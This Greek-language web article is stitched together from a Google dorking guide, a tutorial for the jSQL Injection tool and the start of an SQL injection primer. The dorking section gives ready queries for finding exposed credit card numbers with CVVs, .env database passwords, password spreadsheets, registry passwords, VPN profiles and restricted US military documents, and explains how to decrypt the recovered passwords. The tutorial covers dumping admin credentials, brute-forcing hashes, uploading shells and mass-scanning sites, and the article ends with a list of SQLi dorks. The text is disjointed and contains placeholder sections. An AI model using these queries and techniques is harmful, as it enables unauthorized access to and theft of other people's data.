Οδηγίες για τη χρήση του jSQL Injection, ενός πολυλειτουργικού εργαλείου για την εύρεση και την εκμετάλλευση ενέσεων SQL στο Kali Linux. Χρησιμοποιώντας ελάχιστα γνωστές συναρτήσεις της Google για την εύρεση του κρυφού σχολίου Inurl php επιθυμητό

Για κάθε χειριστή υπάρχει μια ελαφριά έκδοση με μικρότερο όνομα (χωρίς το πρόθεμα all). Η διαφορά είναι ότι το allinurl θα βρει συνδέσμους με όλες τις λέξεις και το inurl θα βρει συνδέσμους μόνο με την πρώτη από αυτές. Η δεύτερη και οι επόμενες λέξεις από το ερώτημα μπορούν να εμφανιστούν οπουδήποτε στις ιστοσελίδες. Ο τελεστής inurl διαφέρει επίσης από έναν άλλο χειριστή με παρόμοια σημασία - τοποθεσία. Η πρώτη σάς επιτρέπει επίσης να βρείτε οποιαδήποτε ακολουθία χαρακτήρων σε έναν σύνδεσμο προς το έγγραφο που αναζητήσατε (για παράδειγμα, /cgi-bin/), το οποίο χρησιμοποιείται ευρέως για την εύρεση στοιχείων με γνωστά τρωτά σημεία.

Ας το δοκιμάσουμε στην πράξη. Παίρνουμε το φίλτρο allintext και κάνουμε το αίτημα να παράγει μια λίστα με αριθμούς και κωδικούς επαλήθευσης πιστωτικών καρτών που θα λήξουν μόνο σε δύο χρόνια (ή όταν οι ιδιοκτήτες τους κουραστούν να ταΐζουν τους πάντες).

Allintext: ημερομηνία λήξης αριθμού κάρτας /2017 cvv

Όταν διαβάζετε στις ειδήσεις ότι ένας νεαρός χάκερ «παραβίασε τους διακομιστές» του Πενταγώνου ή της NASA, κλέβοντας απόρρητες πληροφορίες, στις περισσότερες περιπτώσεις μιλάμε για μια τέτοια βασική τεχνική χρήσης της Google. Ας υποθέσουμε ότι μας ενδιαφέρει μια λίστα με τους υπαλλήλους της NASA και τα στοιχεία επικοινωνίας τους. Σίγουρα μια τέτοια λίστα είναι διαθέσιμη σε ηλεκτρονική μορφή. Για ευκολία ή λόγω επίβλεψης, μπορεί επίσης να βρίσκεται στον ίδιο τον ιστότοπο του οργανισμού. Είναι λογικό ότι σε αυτή την περίπτωση δεν θα υπάρχουν σύνδεσμοι προς αυτό, αφού προορίζεται για εσωτερική χρήση. Ποιες λέξεις μπορεί να υπάρχουν σε ένα τέτοιο αρχείο; Τουλάχιστον - το πεδίο "διεύθυνση". Η δοκιμή όλων αυτών των υποθέσεων είναι εύκολη.

Inurl:nasa.gov τύπος αρχείου:xlsx "διεύθυνση"

Ευρήματα όπως αυτό είναι μια ωραία πινελιά. Πραγματικά αξιόπιστη γνώση παρέχεται από μια πιο λεπτομερή γνώση των χειριστών της Google για webmasters, το ίδιο το Δίκτυο και τις ιδιαιτερότητες της δομής αυτού που αναζητείται. Γνωρίζοντας τις λεπτομέρειες, μπορείτε εύκολα να φιλτράρετε τα αποτελέσματα και να βελτιώσετε τις ιδιότητες των απαραίτητων αρχείων, προκειμένου να λάβετε πραγματικά πολύτιμα δεδομένα στα υπόλοιπα. Είναι αστείο που η γραφειοκρατία έρχεται να σώσει εδώ. Παράγει τυπικές συνθέσεις που είναι βολικές για την αναζήτηση μυστικών πληροφοριών που διέρρευσαν κατά λάθος στο Διαδίκτυο.

Για παράδειγμα, η σφραγίδα δήλωσης διανομής, που απαιτείται από το Υπουργείο Άμυνας των ΗΠΑ, σημαίνει τυποποιημένους περιορισμούς στη διανομή ενός εγγράφου. Το γράμμα Α υποδηλώνει δημόσιες εκδόσεις στις οποίες δεν υπάρχει τίποτα μυστικό. B - προορίζεται μόνο για εσωτερική χρήση, C - αυστηρά εμπιστευτικό και ούτω καθεξής μέχρι το F. Το γράμμα X ξεχωρίζει, το οποίο σηματοδοτεί ιδιαίτερα πολύτιμες πληροφορίες που αντιπροσωπεύουν ένα κρατικό μυστικό ανώτατου επιπέδου. Ας αναζητήσουν τέτοια έγγραφα όσοι υποτίθεται ότι θα το κάνουν εν ώρα υπηρεσίας και θα περιοριστούμε σε αρχεία με το γράμμα C. Σύμφωνα με την οδηγία DoDI 5230.24, αυτή η σήμανση αποδίδεται σε έγγραφα που περιέχουν περιγραφή κρίσιμων τεχνολογιών που εμπίπτουν στον έλεγχο των εξαγωγών . Μπορείτε να βρείτε τέτοιες προσεκτικά προστατευμένες πληροφορίες σε ιστότοπους στο domain.mil ανώτατου επιπέδου, που διατίθενται για τον Στρατό των ΗΠΑ.

"ΔΗΛΩΣΗ ΔΙΑΝΟΜΗΣ Γ" inurl:navy.mil

Είναι πολύ βολικό ο τομέας .mil να περιέχει μόνο τοποθεσίες από το Υπουργείο Άμυνας των ΗΠΑ και τους συμβασιακούς οργανισμούς του. Τα αποτελέσματα αναζήτησης με περιορισμό τομέα είναι εξαιρετικά καθαρά και οι τίτλοι μιλούν από μόνοι τους. Η αναζήτηση ρωσικών μυστικών με αυτόν τον τρόπο είναι πρακτικά άχρηστη: το χάος επικρατεί στα domains.ru και.rf και τα ονόματα πολλών οπλικών συστημάτων ακούγονται σαν βοτανικά (PP "Kiparis", αυτοκινούμενα όπλα "Akatsia") ή ακόμα και φανταστικά ( TOS “Buratino”).

Μελετώντας προσεκτικά οποιοδήποτε έγγραφο από έναν ιστότοπο στον τομέα .mil, μπορείτε να δείτε άλλους δείκτες για να κάνετε πιο συγκεκριμένη την αναζήτησή σας. Για παράδειγμα, μια αναφορά στους περιορισμούς εξαγωγής "Sec 2751", που είναι επίσης βολικό για την αναζήτηση ενδιαφέρουσες τεχνικές πληροφορίες. Κατά καιρούς αφαιρείται από τους επίσημους ιστότοπους όπου εμφανιζόταν κάποτε, επομένως εάν δεν μπορείτε να ακολουθήσετε έναν ενδιαφέρον σύνδεσμο στα αποτελέσματα αναζήτησης, χρησιμοποιήστε την προσωρινή μνήμη της Google (χειριστή προσωρινής μνήμης) ή τον ιστότοπο Αρχείο Διαδικτύου.

Εκτός από τα τυχαία αποχαρακτηρισμένα κυβερνητικά έγγραφα, στην κρυφή μνήμη της Google εμφανίζονται περιστασιακά σύνδεσμοι προς προσωπικά αρχεία από το Dropbox και άλλες υπηρεσίες αποθήκευσης δεδομένων που δημιουργούν «ιδιωτικούς» συνδέσμους προς δημόσια δημοσιευμένα δεδομένα. Είναι ακόμα χειρότερο με εναλλακτικές και σπιτικές υπηρεσίες. Για παράδειγμα, το ακόλουθο ερώτημα βρίσκει δεδομένα για όλους τους πελάτες της Verizon που έχουν εγκατεστημένο διακομιστή FTP και χρησιμοποιούν ενεργά τον δρομολογητή τους.

Allinurl:ftp://verizon.net

Υπάρχουν τώρα περισσότεροι από σαράντα χιλιάδες τέτοιοι έξυπνοι άνθρωποι και την άνοιξη του 2015 ήταν πολλοί περισσότεροι. Αντί για το Verizon.net, μπορείτε να αντικαταστήσετε το όνομα οποιουδήποτε γνωστού παρόχου και όσο πιο διάσημο είναι, τόσο μεγαλύτερο μπορεί να είναι το αλίευμα. Μέσω του ενσωματωμένου διακομιστή FTP, μπορείτε να δείτε αρχεία σε μια εξωτερική συσκευή αποθήκευσης συνδεδεμένη στο δρομολογητή. Συνήθως αυτό είναι ένα NAS για απομακρυσμένη εργασία, ένα προσωπικό σύννεφο ή κάποιο είδος λήψης αρχείων peer-to-peer. Όλα τα περιεχόμενα τέτοιων μέσων ευρετηριάζονται από την Google και άλλες μηχανές αναζήτησης, ώστε να έχετε πρόσβαση σε αρχεία που είναι αποθηκευμένα σε εξωτερικές μονάδες δίσκου μέσω απευθείας συνδέσμου.

Πριν από την εκτεταμένη μετάβαση στο cloud, απλοί διακομιστές FTP κυριαρχούσαν ως απομακρυσμένη αποθήκευση, η οποία είχε επίσης πολλά τρωτά σημεία. Πολλά από αυτά εξακολουθούν να είναι επίκαιρα σήμερα. Για παράδειγμα, το δημοφιλές πρόγραμμα WS_FTP Professional αποθηκεύει δεδομένα διαμόρφωσης, λογαριασμούς χρήστη και κωδικούς πρόσβασης στο αρχείο ws_ftp.ini. Είναι εύκολο να το βρείτε και να διαβάσετε, καθώς όλες οι εγγραφές αποθηκεύονται σε μορφή κειμένου και οι κωδικοί πρόσβασης κρυπτογραφούνται με τον αλγόριθμο Triple DES μετά από ελάχιστη συσκότιση. Στις περισσότερες εκδόσεις, αρκεί απλώς η απόρριψη του πρώτου byte.

Είναι εύκολο να αποκρυπτογραφήσετε τέτοιους κωδικούς πρόσβασης χρησιμοποιώντας το βοηθητικό πρόγραμμα WS_FTP Password Decryptor ή μια δωρεάν υπηρεσία web.

Όταν μιλάμε για παραβίαση ενός αυθαίρετου ιστότοπου, συνήθως εννοούν την απόκτηση κωδικού πρόσβασης από αρχεία καταγραφής και αντίγραφα ασφαλείας αρχείων διαμόρφωσης CMS ή εφαρμογών ηλεκτρονικού εμπορίου. Εάν γνωρίζετε την τυπική δομή τους, μπορείτε εύκολα να υποδείξετε τις λέξεις-κλειδιά. Γραμμές όπως αυτές που βρίσκονται στο ws_ftp.ini είναι εξαιρετικά κοινές. Για παράδειγμα, στο Drupal και στο PrestaShop υπάρχει πάντα ένα αναγνωριστικό χρήστη (UID) και ένας αντίστοιχος κωδικός πρόσβασης (pwd) και όλες οι πληροφορίες αποθηκεύονται σε αρχεία με την επέκταση .inc. Μπορείτε να τα αναζητήσετε ως εξής:

"pwd=" "UID=" ext:inc

Στα αρχεία διαμόρφωσης των διακομιστών SQL, τα ονόματα χρηστών και οι διευθύνσεις email αποθηκεύονται σε καθαρό κείμενο και οι κατακερματισμοί MD5 τους γράφονται αντί για κωδικούς πρόσβασης. Αυστηρά μιλώντας, είναι αδύνατο να τα αποκρυπτογραφήσετε, αλλά μπορείτε να βρείτε ένα ταίριασμα ανάμεσα στα γνωστά ζεύγη hash-password.

Υπάρχουν ακόμη DBMS που δεν χρησιμοποιούν καν κατακερματισμό κωδικού πρόσβασης. Τα αρχεία ρυθμίσεων οποιουδήποτε από αυτά μπορούν απλά να προβληθούν στο πρόγραμμα περιήγησης.

Intext:DB_PASSWORD τύπος αρχείου:env

Με την εμφάνιση των διακομιστών Windows, η θέση των αρχείων διαμόρφωσης καταλήφθηκε εν μέρει από το μητρώο. Μπορείτε να κάνετε αναζήτηση στους κλάδους του με τον ίδιο ακριβώς τρόπο, χρησιμοποιώντας το reg ως τύπο αρχείου. Για παράδειγμα, όπως αυτό:

Τύπος αρχείου:reg HKEY_CURRENT_USER "Password"=

Μερικές φορές είναι δυνατό να φτάσετε σε απόρρητες πληροφορίες χρησιμοποιώντας δεδομένα που ανοίγονται κατά λάθος και έρχονται στην προσοχή της Google. Η ιδανική επιλογή είναι να βρείτε μια λίστα με κωδικούς πρόσβασης σε κάποια κοινή μορφή. Μόνο οι απελπισμένοι άνθρωποι μπορούν να αποθηκεύσουν πληροφορίες λογαριασμού σε αρχείο κειμένου, έγγραφο Word ή υπολογιστικό φύλλο Excel, αλλά υπάρχουν πάντα αρκετές από αυτές.

Τύπος αρχείου:xls inurl:password

Από τη μια πλευρά, υπάρχουν πολλά μέσα για την αποτροπή τέτοιων περιστατικών. Είναι απαραίτητο να καθορίσετε επαρκή δικαιώματα πρόσβασης στο htaccess, να επιδιορθώσετε το CMS, να μην χρησιμοποιήσετε αριστερόστροφα σενάρια και να κλείσετε άλλες τρύπες. Υπάρχει επίσης ένα αρχείο με μια λίστα εξαιρέσεων robots.txt που απαγορεύει στις μηχανές αναζήτησης την ευρετηρίαση των αρχείων και των καταλόγων που καθορίζονται σε αυτό. Από την άλλη, αν η δομή του robots.txt σε κάποιον διακομιστή διαφέρει από την τυπική, τότε γίνεται αμέσως σαφές τι προσπαθούν να κρύψουν σε αυτόν.

Η λίστα των καταλόγων και των αρχείων σε οποιονδήποτε ιστότοπο προηγείται από το τυπικό ευρετήριο του. Εφόσον για λόγους υπηρεσίας πρέπει να εμφανίζεται στον τίτλο, είναι λογικό να περιορίζεται η αναζήτησή του στον τελεστή του τίτλου. Ενδιαφέροντα πράγματα βρίσκονται στους καταλόγους /admin/, /personal/, /etc/ ακόμα και /secret/.

Η συνάφεια είναι εξαιρετικά σημαντική εδώ: τα παλιά τρωτά σημεία κλείνουν πολύ αργά, αλλά το Google και τα αποτελέσματα αναζήτησής του αλλάζουν συνεχώς. Υπάρχει ακόμη και διαφορά μεταξύ ενός φίλτρου "τελευταίου δευτερολέπτου" (&tbs=qdr:s στο τέλος του URL αιτήματος) και ενός φίλτρου "σε πραγματικό χρόνο" (&tbs=qdr:1).

Το χρονικό διάστημα της ημερομηνίας της τελευταίας ενημέρωσης του αρχείου υποδεικνύεται επίσης σιωπηρά από την Google. Μέσω της γραφικής διεπαφής web, μπορείτε να επιλέξετε μία από τις τυπικές περιόδους (ώρα, ημέρα, εβδομάδα κ.λπ.) ή να ορίσετε ένα εύρος ημερομηνιών, αλλά αυτή η μέθοδος δεν είναι κατάλληλη για αυτοματοποίηση.

Από την εμφάνιση της γραμμής διευθύνσεων, μπορείτε μόνο να μαντέψετε έναν τρόπο περιορισμού της παραγωγής των αποτελεσμάτων χρησιμοποιώντας την κατασκευή &tbs=qdr:. Το γράμμα y αφού ορίζει το όριο του ενός έτους (&tbs=qdr:y), το m δείχνει τα αποτελέσματα για τον τελευταίο μήνα, w - για την εβδομάδα, d - για την προηγούμενη ημέρα, h - για την τελευταία ώρα, n - για το λεπτό, και s - για δώσε μου ένα δευτερόλεπτο. Τα πιο πρόσφατα αποτελέσματα που μόλις έγιναν γνωστά στην Google βρίσκονται χρησιμοποιώντας το φίλτρο &tbs=qdr:1.

Εάν πρέπει να γράψετε ένα έξυπνο σενάριο, θα είναι χρήσιμο να γνωρίζετε ότι το εύρος ημερομηνιών έχει οριστεί στο Google σε Ιουλιανή μορφή χρησιμοποιώντας τον τελεστή daterange. Για παράδειγμα, με αυτόν τον τρόπο μπορείτε να βρείτε μια λίστα εγγράφων PDF με τη λέξη εμπιστευτικά, τα οποία έχουν ληφθεί από την 1η Ιανουαρίου έως την 1η Ιουλίου 2015.

Εμπιστευτικός τύπος αρχείου:pdf daterange:2457024-2457205

Το εύρος υποδεικνύεται σε μορφή Ιουλιανής ημερομηνίας χωρίς να λαμβάνεται υπόψη το κλασματικό μέρος. Η μη αυτόματη μετάφραση τους από το Γρηγοριανό ημερολόγιο δεν είναι βολική. Είναι πιο εύκολο να χρησιμοποιήσετε έναν μετατροπέα ημερομηνίας.

Εκτός από τον καθορισμό πρόσθετων τελεστών στο ερώτημα αναζήτησης, μπορούν να σταλούν απευθείας στο σώμα του συνδέσμου. Για παράδειγμα, η προδιαγραφή filetype:pdf αντιστοιχεί στην κατασκευή as_filetype=pdf . Αυτό καθιστά βολικό να ζητήσετε διευκρινίσεις. Ας πούμε ότι η έξοδος αποτελεσμάτων μόνο από τη Δημοκρατία της Ονδούρας καθορίζεται προσθέτοντας την κατασκευή cr=countryHN στη διεύθυνση URL αναζήτησης και μόνο από την πόλη Bobruisk - gcs=Bobruisk. Μπορείτε να βρείτε μια πλήρη λίστα στην ενότητα προγραμματιστών.

Τα εργαλεία αυτοματισμού της Google έχουν σχεδιαστεί για να κάνουν τη ζωή πιο εύκολη, αλλά συχνά προσθέτουν προβλήματα. Για παράδειγμα, η πόλη του χρήστη καθορίζεται από την IP του χρήστη μέσω του WHOIS. Με βάση αυτές τις πληροφορίες, η Google όχι μόνο εξισορροπεί το φορτίο μεταξύ των διακομιστών, αλλά αλλάζει και τα αποτελέσματα αναζήτησης. Ανάλογα με την περιοχή, για το ίδιο αίτημα, θα εμφανιστούν διαφορετικά αποτελέσματα στην πρώτη σελίδα και ορισμένα από αυτά ενδέχεται να είναι εντελώς κρυφά. Ο κωδικός δύο γραμμάτων μετά την οδηγία gl=country θα σας βοηθήσει να νιώσετε σαν κοσμοπολίτης και να αναζητήσετε πληροφορίες από οποιαδήποτε χώρα. Για παράδειγμα, ο κωδικός της Ολλανδίας είναι NL, αλλά το Βατικανό και η Βόρεια Κορέα δεν έχουν δικό τους κωδικό στο Google.

Συχνά, τα αποτελέσματα αναζήτησης καταλήγουν ακατάστατα ακόμα και μετά τη χρήση πολλών προηγμένων φίλτρων. Σε αυτήν την περίπτωση, είναι εύκολο να διευκρινιστεί το αίτημα προσθέτοντας πολλές λέξεις εξαίρεσης σε αυτό (ένα σύμβολο μείον τοποθετείται μπροστά από καθεμία από αυτές). Για παράδειγμα, η τραπεζική, τα ονόματα και ο οδηγός χρησιμοποιούνται συχνά με τη λέξη Personal. Ως εκ τούτου, τα πιο καθαρά αποτελέσματα αναζήτησης δεν θα εμφανίζονται από ένα παράδειγμα ενός σχολικού βιβλίου ενός ερωτήματος, αλλά από ένα εκλεπτυσμένο:

Τίτλος:"Ευρετήριο /Personal/" -ονόματα -tutorial -banking

Ένας εξελιγμένος χάκερ διακρίνεται από το γεγονός ότι παρέχει στον εαυτό του όλα όσα χρειάζεται μόνος του. Για παράδειγμα, το VPN είναι ένα βολικό πράγμα, αλλά είτε ακριβό, είτε προσωρινό και με περιορισμούς. Είναι πολύ ακριβό να εγγραφείτε μόνοι σας. Είναι καλό που υπάρχουν ομαδικές συνδρομές και με τη βοήθεια της Google είναι εύκολο να γίνεις μέλος μιας ομάδας. Για να το κάνετε αυτό, απλώς βρείτε το αρχείο διαμόρφωσης Cisco VPN, το οποίο έχει μια μάλλον μη τυπική επέκταση PCF και μια αναγνωρίσιμη διαδρομή: Program Files\Cisco Systems\VPN Client\Profiles. Ένα αίτημα και γίνεσαι μέλος, για παράδειγμα, στη φιλική ομάδα του Πανεπιστημίου της Βόννης.

Τύπος αρχείου:pcf vpn Ή Ομάδα

Οι κωδικοί πρόσβασης αποθηκεύονται κρυπτογραφημένοι, αλλά ο Maurice Massard έχει ήδη γράψει ένα πρόγραμμα για την αποκρυπτογράφηση τους και το παρέχει δωρεάν μέσω του thecampusgeeks.com.

Η Google εκτελεί εκατοντάδες διαφορετικούς τύπους επιθέσεων και δοκιμές διείσδυσης. Υπάρχουν πολλές επιλογές, που επηρεάζουν δημοφιλή προγράμματα, μεγάλες μορφές βάσης δεδομένων, πολυάριθμα τρωτά σημεία της PHP, σύννεφα και ούτω καθεξής. Γνωρίζοντας τι ακριβώς ψάχνετε θα είναι πολύ πιο εύκολο να βρείτε τις πληροφορίες που χρειάζεστε (ειδικά τις πληροφορίες που δεν είχατε σκοπό να δημοσιοποιήσετε). Ο Shodan δεν είναι ο μόνος που τροφοδοτεί με ενδιαφέρουσες ιδέες, αλλά κάθε βάση δεδομένων ευρετηριασμένων πόρων δικτύου!

Εκτελέστε το ληφθέν αρχείο κάνοντας διπλό κλικ (πρέπει να έχετε μια εικονική μηχανή).

[Ενότητα υπό ανάπτυξη]

[Ενότητα υπό ανάπτυξη]

[Ενότητα υπό ανάπτυξη]

Η εργασία με το πρόγραμμα είναι εξαιρετικά απλή. Απλώς πληκτρολογήστε τη διεύθυνση του ιστότοπου και πατήστε ENTER.

Το ακόλουθο στιγμιότυπο οθόνης δείχνει ότι ο ιστότοπος είναι ευάλωτος σε τρεις τύπους εγχύσεων SQL ταυτόχρονα (οι πληροφορίες σχετικά με αυτές υποδεικνύονται στην κάτω δεξιά γωνία). Κάνοντας κλικ στα ονόματα των ενέσεων, μπορείτε να αλλάξετε τη μέθοδο που χρησιμοποιείται:

Επίσης, οι υπάρχουσες βάσεις δεδομένων μας έχουν ήδη εμφανιστεί.

Μπορείτε να δείτε τα περιεχόμενα κάθε πίνακα:

Συνήθως, το πιο ενδιαφέρον πράγμα σχετικά με τους πίνακες είναι τα διαπιστευτήρια διαχειριστή.

Αν είστε τυχεροί και βρείτε τα δεδομένα του διαχειριστή, τότε είναι πολύ νωρίς για να χαρείτε. Πρέπει ακόμα να βρείτε τον πίνακα διαχειριστή όπου θα εισαγάγετε αυτά τα δεδομένα.

Για να το κάνετε αυτό, μεταβείτε στην επόμενη καρτέλα. Εδώ μας καλωσορίζει με μια λίστα πιθανών διευθύνσεων. Μπορείτε να επιλέξετε μία ή περισσότερες σελίδες για έλεγχο:

Η ευκολία έγκειται στο γεγονός ότι δεν χρειάζεται να χρησιμοποιήσετε άλλα προγράμματα.

Δυστυχώς, δεν υπάρχουν πολλοί απρόσεκτοι προγραμματιστές που αποθηκεύουν κωδικούς πρόσβασης σε καθαρό κείμενο. Αρκετά συχνά στη γραμμή κωδικού πρόσβασης βλέπουμε κάτι σαν

8743b52063cd84097a65d1633f5c74f5

Αυτό είναι χασίς. Μπορείτε να το αποκρυπτογραφήσετε χρησιμοποιώντας ωμή βία. Και... Το jSQL Injection έχει ενσωματωμένο brute forcer.

Η αναμφισβήτητη ευκολία είναι ότι δεν χρειάζεται να αναζητήσετε άλλα προγράμματα. Υπάρχει υποστήριξη για πολλά από τα πιο δημοφιλή hashes.

Αυτή δεν είναι η καλύτερη επιλογή. Για να γίνετε γκουρού στην αποκωδικοποίηση των κατακερματισμών, συνιστάται το Βιβλίο "" στα Ρωσικά.

Αλλά, φυσικά, όταν δεν υπάρχει άλλο πρόγραμμα στη διάθεσή σας ή δεν υπάρχει χρόνος για μελέτη, το jSQL Injection με την ενσωματωμένη λειτουργία brute force θα σας φανεί πολύ χρήσιμο.

Υπάρχουν ρυθμίσεις: μπορείτε να ορίσετε ποιοι χαρακτήρες περιλαμβάνονται στον κωδικό πρόσβασης, το εύρος μήκους κωδικού πρόσβασης.

Εκτός από τις λειτουργίες με βάσεις δεδομένων - την ανάγνωση και την τροποποίησή τους, εάν εντοπιστούν ενέσεις SQL, μπορούν να εκτελεστούν οι ακόλουθες λειτουργίες αρχείων:

• ανάγνωση αρχείων στον διακομιστή
• μεταφόρτωση νέων αρχείων στον διακομιστή
• ανέβασμα κελύφους στον διακομιστή

Και όλα αυτά υλοποιούνται στο jSQL Injection!

Υπάρχουν περιορισμοί - ο διακομιστής SQL πρέπει να έχει δικαιώματα αρχείων. Οι διαχειριστές του έξυπνου συστήματος τα έχουν απενεργοποιήσει και δεν θα μπορούν να αποκτήσουν πρόσβαση στο σύστημα αρχείων.

Η παρουσία προνομίων αρχείου είναι αρκετά απλό να ελεγχθεί. Μεταβείτε σε μία από τις καρτέλες (ανάγνωση αρχείων, δημιουργία κελύφους, αποστολή νέου αρχείου) και προσπαθήστε να εκτελέσετε μία από τις καθορισμένες λειτουργίες.

Μια άλλη πολύ σημαντική σημείωση - πρέπει να γνωρίζουμε την ακριβή απόλυτη διαδρομή προς το αρχείο με το οποίο θα εργαστούμε - διαφορετικά τίποτα δεν θα λειτουργήσει.

Δείτε το παρακάτω στιγμιότυπο οθόνης:

Για οποιαδήποτε προσπάθεια λειτουργίας σε αρχείο, απαντάμε: Χωρίς προνόμιο FILE (χωρίς δικαιώματα αρχείου). Και εδώ δεν μπορεί να γίνει τίποτα.

Αν αντ 'αυτού έχετε άλλο σφάλμα:

Πρόβλημα εγγραφής στο [όνομα_καταλόγου]

Αυτό σημαίνει ότι προσδιορίσατε εσφαλμένα την απόλυτη διαδρομή όπου θέλετε να γράψετε το αρχείο.

Για να μαντέψετε μια απόλυτη διαδρομή, πρέπει να γνωρίζετε τουλάχιστον το λειτουργικό σύστημα στο οποίο λειτουργεί ο διακομιστής. Για να το κάνετε αυτό, μεταβείτε στην καρτέλα Δίκτυο.

Αυτή η καταχώρηση (γραμμή Win64) μας δίνει λόγο να υποθέσουμε ότι έχουμε να κάνουμε με λειτουργικό σύστημα Windows:

Keep-Alive: timeout=5, max=99 Διακομιστής: Apache/2.4.17 (Win64) PHP/7.0.0RC6 Σύνδεση: Keep-Alive Μέθοδος: HTTP/1.1 200 OK Content-Length: 353 Ημερομηνία: Παρ, 11 Δεκ 2 11:48:31 GMT X-Powered-By: PHP/7.0.0RC6 Τύπος περιεχομένου: text/html; σύνολο χαρακτήρων=UTF-8

Εδώ έχουμε μερικά Unix (*BSD, Linux):

Μεταφορά-Κωδικοποίηση: τεμαχισμένη Ημερομηνία: Παρ, 11 Δεκεμβρίου 2015 11:57:02 GMT Μέθοδος: HTTP/1.1 200 OK Keep-Alive: timeout=3, max=100 Σύνδεση: keep-alive Content-Type: text/html X- Τροφοδοτείται από: PHP/5.3.29 Διακομιστής: Apache/2.2.31 (Unix)

Και εδώ έχουμε το CentOS:

Μέθοδος: HTTP/1.1 200 OK Λήγει: Πέμ. 19 Νοεμβρίου 1981 08:52:00 GMT Set-Cookie: PHPSESSID=9p60gtunrv7g41iurr814h9rd0; path=/ Σύνδεση: keep-alive X-Cache-Lookup: MISS από t1.hoster.ru:6666 Διακομιστής: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.4.37 X-Cache: MISS από t1.hoster.ru Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Ημερομηνία: Παρ, 11 Δεκεμβρίου 2015 12:08:54 GMT Μεταφορά-Κωδικοποίηση: τεμαχισμένο Περιεχόμενο-Τύπος: κείμενο/html; σύνολο χαρακτήρων=WINDOWS-1251

Στα Windows, ένας τυπικός φάκελος για τοποθεσίες είναι ο C:\Server\data\htdocs\ . Αλλά, στην πραγματικότητα, αν κάποιος «σκέφτηκε» να φτιάξει έναν διακομιστή στα Windows, τότε, πολύ πιθανό, αυτό το άτομο δεν έχει ακούσει τίποτα για προνόμια. Επομένως, θα πρέπει να αρχίσετε να προσπαθείτε απευθείας από τον κατάλογο C:/Windows/:

Όπως μπορείτε να δείτε, όλα πήγαν καλά την πρώτη φορά.

Αλλά τα ίδια τα κελύφη jSQL Injection εγείρουν αμφιβολίες στο μυαλό μου. Εάν έχετε δικαιώματα αρχείου, τότε μπορείτε εύκολα να ανεβάσετε κάτι με μια διεπαφή ιστού.

Και ακόμη και αυτή η λειτουργία είναι διαθέσιμη στο jSQL Injection. Όλα είναι εξαιρετικά απλά - κατεβάστε μια λίστα ιστότοπων (μπορείτε να εισαγάγετε από ένα αρχείο), επιλέξτε αυτούς που θέλετε να ελέγξετε και κάντε κλικ στο κατάλληλο κουμπί για να ξεκινήσει η λειτουργία.

Το jSQL Injection είναι ένα καλό, ισχυρό εργαλείο για αναζήτηση και στη συνέχεια χρήση ενέσεων SQL που βρίσκονται σε ιστότοπους. Τα αναμφισβήτητα πλεονεκτήματά του: ευκολία χρήσης, ενσωματωμένες σχετικές λειτουργίες. Το jSQL Injection μπορεί να είναι ο καλύτερος φίλος ενός αρχαρίου όταν αναλύει ιστότοπους.

Μεταξύ των ελλείψεων, θα σημειώσω την αδυναμία επεξεργασίας βάσεων δεδομένων (τουλάχιστον δεν βρήκα αυτή τη λειτουργικότητα). Όπως συμβαίνει με όλα τα εργαλεία GUI, ένα από τα μειονεκτήματα αυτού του προγράμματος μπορεί να αποδοθεί στην αδυναμία χρήσης του σε σενάρια. Ωστόσο, σε αυτό το πρόγραμμα είναι επίσης δυνατός κάποιος αυτοματισμός - χάρη στην ενσωματωμένη λειτουργία μαζικού ελέγχου τοποθεσίας.

Το πρόγραμμα jSQL Injection είναι πολύ πιο βολικό στη χρήση από το sqlmap. Αλλά το sqlmap υποστηρίζει περισσότερους τύπους ενέσεων SQL, έχει επιλογές για εργασία με τείχη προστασίας αρχείων και ορισμένες άλλες λειτουργίες.

Κατώτατη γραμμή: Το jSQL Injection είναι ο καλύτερος φίλος ενός αρχάριου χάκερ.

Βοήθεια για αυτό το πρόγραμμα στην Εγκυκλοπαίδεια Kali Linux μπορείτε να βρείτε σε αυτή τη σελίδα: http://kali.tools/?p=706

Αποφάσισα να μιλήσω λίγο για την ασφάλεια των πληροφοριών. Το άρθρο θα είναι χρήσιμο για αρχάριους προγραμματιστές και όσους μόλις άρχισαν να ασχολούνται με την ανάπτυξη του Frontend. Ποιο είναι το πρόβλημα?

Πολλοί αρχάριοι προγραμματιστές παρασύρονται τόσο πολύ με τη σύνταξη κώδικα που ξεχνούν εντελώς την ασφάλεια της εργασίας τους. Και το πιο σημαντικό, ξεχνούν τέτοια τρωτά σημεία όπως τα ερωτήματα SQL και XXS. Επίσης, βρίσκουν εύκολους κωδικούς πρόσβασης για τα διοικητικά πάνελ τους και υπόκεινται σε ωμή βία. Ποιες είναι αυτές οι επιθέσεις και πώς μπορείτε να τις αποφύγετε;

Η έγχυση SQL είναι ο πιο συνηθισμένος τύπος επίθεσης σε μια βάση δεδομένων, ο οποίος πραγματοποιείται κατά τη διάρκεια ενός ερωτήματος SQL για ένα συγκεκριμένο DBMS. Πολλοί άνθρωποι, ακόμη και μεγάλες εταιρείες υποφέρουν από τέτοιες επιθέσεις. Ο λόγος είναι ένα σφάλμα προγραμματιστή κατά τη σύνταξη της βάσης δεδομένων και, αυστηρά, τα ερωτήματα SQL.

Μια επίθεση έγχυσης SQL είναι δυνατή λόγω εσφαλμένης επεξεργασίας των δεδομένων εισόδου που χρησιμοποιούνται σε ερωτήματα SQL. Εάν η επίθεση ενός χάκερ είναι επιτυχής, κινδυνεύετε να χάσετε όχι μόνο τα περιεχόμενα των βάσεων δεδομένων, αλλά και τους κωδικούς πρόσβασης και τα αρχεία καταγραφής του πίνακα διαχείρισης. Και αυτά τα δεδομένα θα είναι αρκετά για να κατακτήσουν πλήρως τον ιστότοπο ή να κάνουν μη αναστρέψιμες προσαρμογές σε αυτόν.

Η επίθεση μπορεί να αναπαραχθεί με επιτυχία σε σενάρια γραμμένα σε PHP, ASP, Perl και άλλες γλώσσες. Η επιτυχία τέτοιων επιθέσεων εξαρτάται περισσότερο από το τι DBMS χρησιμοποιείται και τον τρόπο υλοποίησης του ίδιου του σεναρίου. Υπάρχουν πολλοί ευάλωτοι ιστότοποι για ενέσεις SQL στον κόσμο. Αυτό είναι εύκολο να επαληθευτεί. Απλώς πληκτρολογήστε "dorks" - αυτά είναι ειδικά ερωτήματα για την αναζήτηση ευάλωτων τοποθεσιών. Εδώ είναι μερικά από αυτά:

• inurl:index.php?id=
• inurl:trainers.php?id=
• inurl:buy.php?category=
• inurl:article.php?ID=
• inurl:play_old.php?id=
